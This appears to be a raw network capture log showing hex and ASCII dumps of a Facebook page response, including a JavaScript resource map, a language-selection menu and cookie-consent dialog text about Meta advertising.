                                                                                                                                                                                    2023-01-05 08:00:19 UTC19860INData Raw: 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 43 4b 50 34 52 57 4d 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 32 46 63 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 77 55 78 54 63 50 53 69 32 71 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 56 52 7a 53 56 48 35 69 55 2d 56 2e 6a 73 3f 5f 6e
                                                                                                                                                                                    Data Ascii: j3Wp8lg5Kz","nc":1},"CKP4RWM":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i2Fc4\/y_\/l\/en_US\/wUxTcPSi2qA.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/VRzSVH5iU-V.js?_n
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19861INData Raw: 51 36 4e 44 4a 77 65 44 74 39 4c 6d 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6b 61 58 4e 77 62 47 46 35 4f 6d 4a 73 62 32 4e 72 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 22 2c 22 6e 63 22 3a 31 2c 22 64 22 3a 31 7d 7d 2c 22 63 6f 6d 70 4d 61 70 22 3a 7b 22 44 6f 63 6b 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 74 75 65 37 4e 33 65 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 4d 37 5c 2f 6a 6c 43 52 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 65 33 64 79 57 61 46 22 2c 22 4b 42 72 72 65 57 4d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72
                                                                                                                                                                                    Data Ascii: Q6NDJweDt9LmJvb3Rsb2FkZXJfUF9tcjVWRXtkaXNwbGF5OmJsb2NrIWltcG9ydGFudDt9","nc":1,"d":1}},"compMap":{"Dock":{"r":["rrnSMd9","fBNyzd4","uZnYnjA","tue7N3e","+CEjbBy","SgD0G1q","pI0Ykx3","M7\/jlCR","0IBz+Hp","ttXpwpR","e3dyWaF","KBrreWM"],"be":1},"WebSpeedInter
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19863INData Raw: 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 2c 22 53 67 44 30 47 31 71 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 41 70 70 72 6f 76 61 6c 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 53 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 64 47 65 62 33 7a 49 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 6d 30 7a 4c 6d 36 49 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 50 56 73 32 34 4e 41 22 2c 22 62 35 68 5c 2f 73
                                                                                                                                                                                    Data Ascii: ba_DEPRECATED"],"r":["uZnYnjA","SgD0G1q"]},"be":1},"PhotoTagApproval":{"r":["fBNyzd4","+CEjbBy","l+zYE0s","uyLLtYc","e3dyWaF"],"be":1},"PhotoSnowlift":{"r":["dGeb3zI","R5w1rCJ","rrnSMd9","fBNyzd4","uZnYnjA","ibNDccx","m0zLm6I","e9ANzw\/","PVs24NA","b5h\/s
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19864INData Raw: 7a 2b 48 70 22 2c 22 68 76 59 44 71 32 36 22 2c 22 77 4b 49 32 2b 6a 30 22 2c 22 50 55 64 36 34 39 6b 22 2c 22 4b 56 2b 78 7a 43 55 22 2c 22 68 35 4e 67 6d 4d 58 22 2c 22 74 74 58 70 77 70 52 22 2c 22 58 4a 55 6b 52 78 38 22 2c 22 4c 42 47 7a 63 61 67 22 2c 22 66 61 5a 44 6d 79 4f 22 2c 22 65 33 64 79 57 61 46 22 2c 22 4b 42 72 72 65 57 4d 22 2c 22 6e 4e 78 6a 46 2b 4e 22 2c 22 6a 6a 50 42 58 4b 6c 22 2c 22 34 57 75 33 4b 42 51 22 2c 22 67 49 5a 67 73 58 6a 22 2c 22 4f 7a 38 78 74 59 56 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f
                                                                                                                                                                                    Data Ascii: z+Hp","hvYDq26","wKI2+j0","PUd649k","KV+xzCU","h5NgmMX","ttXpwpR","XJUkRx8","LBGzcag","faZDmyO","e3dyWaF","KBrreWM","nNxjF+N","jjPBXKl","4Wu3KBQ","gIZgsXj","Oz8xtYV"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitio
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19865INData Raw: 2f 22 2c 22 64 76 78 49 54 75 6f 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 53 67 44 30 47 31 71 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 4c 5c 2f 37 37 36 47 49 22 2c 22 53 67 44 30 47 31 71 22 2c 22 64 76 78 49 54 75 6f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 64 47 65 62 33 7a 49 22 2c 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30
                                                                                                                                                                                    Data Ascii: /","dvxITuo"],"be":1},"ODS":{"r":["SgD0G1q"],"be":1},"KeyEventTypedLogger":{"r":["L\/776GI","SgD0G1q","dvxITuo"],"rds":{"m":["BanzaiScuba_DEPRECATED"],"r":["uZnYnjA"]},"be":1},"Dialog":{"r":["dGeb3zI","rrnSMd9","fBNyzd4","uZnYnjA","+CEjbBy","SgD0G1q","pI0
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19867INData Raw: 62 4e 44 63 63 78 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 41 69 6a 39 5a 39 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 31 34 37 76 78 35 41 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 58 4a 55 6b 52 78 38 22 2c 22 67 49 5a 67 73 58 6a 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22
                                                                                                                                                                                    Data Ascii: bNDccx","jskFjuE","+CEjbBy","eAij9Z9","gitt+mK","SgD0G1q","pI0Ykx3","il8+1P2","ORfF6wp","badRKqB","147vx5A","0IBz+Hp","ttXpwpR","XJUkRx8","gIZgsXj","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["uZnYnjA"]},"be":1},"XUIDialogBody.react"
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19868INData Raw: 74 58 70 77 70 52 22 2c 22 4b 42 72 72 65 57 4d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 67 49 5a 67 73 58 6a 22 2c 22 4f 7a 38 78 74 59 56 22 2c 22 50 5c 2f 6d 72 35 56 45 22 2c 22 50 56 73 32 34 4e 41 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f
                                                                                                                                                                                    Data Ascii: tXpwpR","KBrreWM","R5w1rCJ","mO2RUoG","CGkH4FY","e9ANzw\/","gIZgsXj","Oz8xtYV","P\/mr5VE","PVs24NA"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerCo
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19870INData Raw: 30 5f 45 46 22 2c 22 48 54 4d 4c 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 54 62 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 4a 44 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 5c 2f 75 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 70 78 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 5c 2f 43 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 4f 73 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 4b 67 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 38 53 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 66
                                                                                                                                                                                    Data Ascii: 0_EF","HTML","__markup_3310c079_0_1_Tb","__markup_3310c079_0_2_JD","__markup_3310c079_0_3_\/u","__markup_3310c079_0_4_px","__markup_3310c079_0_5_\/C","__markup_3310c079_0_6_Os","__markup_3310c079_0_7_Kg","__markup_3310c079_0_8_8S","__markup_3310c079_0_9_f
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19871INData Raw: 61 6c 75 65 22 3a 22 65 6e 5f 47 42 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 5c 2f 75 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65
                                                                                                                                                                                    Data Ascii: alue":"en_GB","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_3_\/u"},"label":"English (UK)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectable
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19873INData Raw: 4e 65 64 65 72 6c 61 6e 64 73 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 62 5f 4e 4f 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 6f 59 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c
                                                                                                                                                                                    Data Ascii: Nederlands","title":"","className":"headerItem"},{"class":"headerItem","value":"nb_NO","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_b_oY"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"cl
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19874INData Raw: 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 6b 57 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31
                                                                                                                                                                                    Data Ascii: :"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_i_kW"},"label":"Ti\u1ebfng Vi\u1ec7t","title":"","className":"headerItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_331
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19875INData Raw: 33 38 37 61 0d 0a 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 5c 2f 45 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74
                                                                                                                                                                                    Data Ascii: 387aR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_\/E"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ct
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19877INData Raw: 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 69 72 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 5c 2f 74 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69
                                                                                                                                                                                    Data Ascii: ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_ir"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_\/t","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19878INData Raw: 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 7d 5d 2c 7b 22 61 6c 69 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 34 74 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f
                                                                                                                                                                                    Data Ascii: ip"},{"__m":"ContextualDialogArrow"},{"__m":"ContextualLayerPositionClassOnContext"}],{"alignh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_4t",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19880INData Raw: 5f 39 61 38 35 62 33 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74
                                                                                                                                                                                    Data Ascii: _9a85b3\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Meta Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Met
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19881INData Raw: 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 5c 75 30 30 33 43 5c 2f 61 3e 20 66 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                                    Data Ascii: her companies\u003C\/a> for advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19883INData Raw: 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 53 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6f 6e 20 6f 75 72 20 70 72 6f 64 75 63 74 73 20 6d 61 79 20 6e 6f 74 20 77 6f 72 6b 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68
                                                                                                                                                                                    Data Ascii: u003Cli class=\"_9xq0\">Some features on our products may not work\u003C\/li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Oth
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19884INData Raw: 68 65 20 77 61 79 73 20 41 75 64 69 65 6e 63 65 20 4e 65 74 77 6f 72 6b 20 73 68 6f 77 73 20 72 65 6c 65 76 61 6e 74 20 61 64 73 20 69 73 20 62 79 20 75 73 69 6e 67 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c
                                                                                                                                                                                    Data Ascii: he ways Audience Network shows relevant ads is by using your ad preferences to determine which ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19886INData Raw: 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 53 74 58 75 31 34 30 71 2d 31 34 20 73 78 5f 36 65 38 38 37 62 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 